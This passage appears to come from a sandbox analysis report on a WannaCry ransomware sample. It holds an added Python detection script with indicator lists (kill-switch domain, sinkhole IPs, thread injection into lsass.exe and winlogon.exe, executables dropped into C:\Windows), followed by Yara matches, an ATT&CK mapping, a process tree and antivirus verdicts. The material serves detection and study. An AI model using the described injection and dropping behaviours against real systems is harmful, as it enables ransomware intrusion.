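The two mssecsvc.exe code-function lines above (the GetSystemTime/gethostbyname/connect check and the CreateToolhelp32Snapshot/OpenProcess/CreateRemoteThread chain) and the Security Center registry and WMI activity in this section are the behaviours an analyst would turn into endpoint detections. The following is an added example, not code from Joe Sandbox or from this report: it correlates Sysmon-style events against the indicators the report records for this sample (the kill-switch domain, the two Cloudflare addresses it contacted, the executables started from C:\Windows, the system processes that received remote threads, and the Security Center key). The event format, the event lines themselves and the rule names are constructed for the example. One caveat the report itself supports: svchost.exe is listed among the processes this sample injects into, so a Security Center change made by svchost.exe is kept as a separate finding rather than treated as a verdict on its own.

```python
import re

# Indicators taken from this report: the kill-switch domain and the two addresses
# mssecsvc.exe contacted, the system processes it injected into, and the
# Security Center key svchost.exe modified.
KILL_SWITCH_DOMAIN = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
SINKHOLE_IPS = {"104.16.173.80", "104.17.244.81"}
PROTECTED_TARGETS = {"lsass.exe", "winlogon.exe", "svchost.exe", "fontdrvhost.exe", "dwm.exe"}
SECURITY_CENTER_KEY = r"hklm\software\microsoft\security center"
# An .exe started directly from C:\Windows (not a subdirectory) is the report's
# "Drops executables to the windows directory (C:\Windows) and starts them".
WINDOWS_ROOT_EXE = re.compile(r"^c:\\windows\\[^\\]+\.exe$")

# Constructed Sysmon-style events (kind|source image|details...), not captured
# telemetry; they mirror what the report records for this sample plus two
# benign lines that must not fire.
SAMPLE_EVENTS = [
    "ProcessCreate|C:\\Windows\\System32\\rundll32.exe|C:\\Windows\\mssecsvc.exe",
    "DnsQuery|C:\\Windows\\mssecsvc.exe|www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com|104.16.173.80",
    "NetworkConnect|C:\\Windows\\mssecsvc.exe|104.17.244.81|80",
    "ProcessCreate|C:\\Windows\\mssecsvc.exe|C:\\Windows\\tasksche.exe",
    "CreateRemoteThread|C:\\Windows\\mssecsvc.exe|C:\\Windows\\System32\\lsass.exe",
    "CreateRemoteThread|C:\\Windows\\mssecsvc.exe|C:\\Windows\\System32\\winlogon.exe",
    "CreateRemoteThread|C:\\Windows\\mssecsvc.exe|C:\\Windows\\System32\\svchost.exe",
    "RegistrySet|C:\\Windows\\System32\\svchost.exe|HKLM\\SOFTWARE\\Microsoft\\Security Center\\cval",
    "ProcessCreate|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe",
    "DnsQuery|C:\\Windows\\System32\\svchost.exe|www.msftconnecttest.com|13.107.4.52",
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict:
    """Split 'kind|image|arg...' and lower-case paths so matching is case-insensitive."""
    kind, image, *args = line.split("|")
    return {"kind": kind, "image": image.lower(), "args": [a.lower() for a in args]}


def detect(lines):
    """Return (rule, evidence) findings for the event lines, one per matching event."""
    findings = []
    for ev in map(parse_event, lines):
        kind, image, args = ev["kind"], ev["image"], ev["args"]
        if kind == "DnsQuery" and args[0] == KILL_SWITCH_DOMAIN:
            findings.append(("killswitch_lookup", basename(image)))
        if kind == "DnsQuery" and len(args) > 1 and args[1] in SINKHOLE_IPS:
            findings.append(("sinkhole_contact", args[1]))
        if kind == "NetworkConnect" and args[0] in SINKHOLE_IPS:
            findings.append(("sinkhole_contact", args[0]))
        if kind == "ProcessCreate" and WINDOWS_ROOT_EXE.match(args[0]):
            findings.append(("exe_started_from_windows_root", basename(args[0])))
        if (kind == "CreateRemoteThread" and basename(args[0]) in PROTECTED_TARGETS
                and not image.startswith("c:\\windows\\system32\\")):
            findings.append(("remote_thread_into_system_process",
                             f"{basename(image)} -> {basename(args[0])}"))
        if kind == "RegistrySet" and args[0].startswith(SECURITY_CENTER_KEY):
            # svchost.exe hosts the Security Center service and is also one of the
            # processes this sample injects into, so this stays a finding, not a verdict.
            findings.append(("security_center_modified", args[0]))
    return findings


def verdict(findings) -> str:
    """Combine findings; the three worm behaviours together are the strong signal."""
    rules = {rule for rule, _ in findings}
    worm = {"killswitch_lookup", "exe_started_from_windows_root",
            "remote_thread_into_system_process"}
    if worm <= rules:
        return "wannacry-like worm: kill-switch lookup, self-drop into C:\\Windows, thread injection"
    if rules:
        return "suspicious: " + ", ".join(sorted(rules))
    return "clean"


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule, evidence in found:
        print(f"{rule:36} {evidence}")
    print(verdict(found))
```

The C:\Windows-root rule is deliberately broader than the two file names in this report, since the path pattern, not the name, is what the report's "drops executables to the windows directory and starts them" signature keys on; the injection rule likewise flags any non-System32 image creating a thread in lsass.exe, winlogon.exe, svchost.exe, fontdrvhost.exe or dwm.exe, the process set the report lists under its Yara memory matches.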

              Stealing of Sensitive Information

              Source: Yara matchFile source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000000.384952230.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000000.427531330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000000.392931300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.784858398.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.283233215.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.785379244.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.275433265.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302543511.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000000.431362516.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298581179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.297399320.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.300859546.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.785172242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321636086.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321813327.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.785061929.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319687483.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.785023367.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.784858957.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280733139.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.785329413.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.785042903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.784832443.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.435545169.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321645741.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.785141452.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.785409783.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280760913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302520549.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298527592.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321842635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.270789242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.785106286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000000.310448882.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319657354.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.785307990.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296758568.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.785177108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.290186231.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000000.389181031.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.784858725.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000000.407443351.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.300842077.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.785185973.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.784853909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.785122913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000000.411115059.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.280492982.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.785080117.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296737411.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6408, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 724, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 984, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 316, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 416, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 960, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara matchFile source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000000.384952230.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000000.427531330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000000.392931300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.784858398.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.283233215.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.785379244.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.275433265.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302543511.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000000.431362516.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298581179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.297399320.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.300859546.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.785172242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321636086.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321813327.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.785061929.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319687483.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.785023367.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.784858957.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280733139.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.785329413.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.785042903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.784832443.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.435545169.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321645741.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.785141452.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.785409783.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280760913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302520549.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298527592.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321842635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.270789242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.785106286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000000.310448882.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319657354.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.785307990.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296758568.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.785177108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.290186231.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000000.389181031.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.784858725.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000000.407443351.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.300842077.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.785185973.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.784853909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.785122913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000000.411115059.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.280492982.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.785080117.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296737411.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6408, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 724, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 984, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 316, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 416, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 960, type: MEMORYSTR
              MITRE ATT&CK Matrix, listed per tactic column. A number in square brackets is the report's signature-count badge for that technique; techniques without one are the grid's entries that no signature mapped to.

              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: Windows Management Instrumentation [1]; Native API [12]; Command and Scripting Interpreter [2]; Service Execution [2]; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
              Persistence: DLL Side-Loading [1]; Windows Service [4]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
              Privilege Escalation: DLL Side-Loading [1]; Windows Service [4]; Process Injection [412]; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
              Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [1]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [121]; Virtualization/Sandbox Evasion [31]; Process Injection [412]; Rundll32 [1]
              Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: System Time Discovery [11]; System Information Discovery [123]; Security Software Discovery [371]; Virtualization/Sandbox Evasion [31]; Process Discovery [3]; Remote System Discovery [1]; Network Sniffing; Network Service Scanning
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
              Collection: Archive Collected Data [1]; Input Capture [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Command and Control: Ingress Tool Transfer [12]; Encrypted Channel [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [2]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
              Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
              Impact: Data Encrypted for Impact [1]; Device Lockout; Delete Device Data
              Behavior Graph (ID 670186, sample FjYNZSPNkt, start date 20/07/2022, architecture WINDOWS, score 100)

              Signatures attached to the start node: Tries to download HTTP data from a sinkholed server; Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; 9 other signatures

              Process tree recovered from the graph (node numbers in parentheses are the graph's own):

              loaddll32.exe (10)
                  cmd.exe (20)
                      rundll32.exe (28)
                          mssecsvc.exe (35): connects to 104.17.244.81 port 80 from local port 49792 (CLOUDFLARENETUS, United States) and to www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 6 other signatures
                              injected: lsass.exe (41): Writes to foreign memory regions; in turn injects backgroundTaskHost.exe (50)
                              injected: svchost.exe (44): starts BackgroundTransferHost.exe (52) and backgroundTaskHost.exe (54)
                              injected: winlogon.exe (46)
                              injected: 14 other processes (48)
                  rundll32.exe (22): Drops executables to the windows directory (C:\Windows) and starts them
                      mssecsvc.exe (30): resolves www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com to 104.16.173.80 and connects to port 80 from local port 49756 (CLOUDFLARENETUS, United States), with the signature "Tries to resolve many domain names, but no domain seems valid" attached to that domain; drops C:\Windows\tasksche.exe (PE32); Drops executables to the windows directory (C:\Windows) and starts them
                          tasksche.exe (39): Detected Wannacry Ransomware
                  rundll32.exe (25): drops C:\Windows\mssecsvc.exe (PE32)
              mssecsvc.exe (12): Maps a DLL or memory area into another process
              svchost.exe (15): Changes security center settings (notifications, updates, antivirus, firewall)
              9 other processes (17): traffic to 127.0.0.1

Source | Detection | Scanner | Label
FjYNZSPNkt.dll | 86% | Virustotal |
FjYNZSPNkt.dll | 78% | Metadefender |
FjYNZSPNkt.dll | 96% | ReversingLabs | Win32.Ransomware.WannaCry
FjYNZSPNkt.dll | 100% | Avira | W32/Virut.Gen
FjYNZSPNkt.dll | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Windows\mssecsvc.exe | 100% | Avira | W32/Virut.Gen
C:\Windows\tasksche.exe | 100% | Avira | TR/FileCoder.AU
C:\Windows\mssecsvc.exe | 100% | Joe Sandbox ML |
C:\Windows\tasksche.exe | 100% | Joe Sandbox ML |
C:\Windows\mssecsvc.exe | 97% | ReversingLabs | Win32.Ransomware.WannaCry
C:\Windows\tasksche.exe | 85% | Metadefender |
C:\Windows\tasksche.exe | 95% | ReversingLabs | Win32.Ransomware.WannaCry
Source | Detection | Scanner | Label
4.0.mssecsvc.exe.400000.6.unpack | 100% | Avira | W32/Virut.Gen
4.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
29.0.tasksche.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.7100a4.5.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
11.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
4.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
6.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.400000.2.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.400000.4.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.7100a4.5.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.7100a4.7.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.400000.2.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.7100a4.7.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
11.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
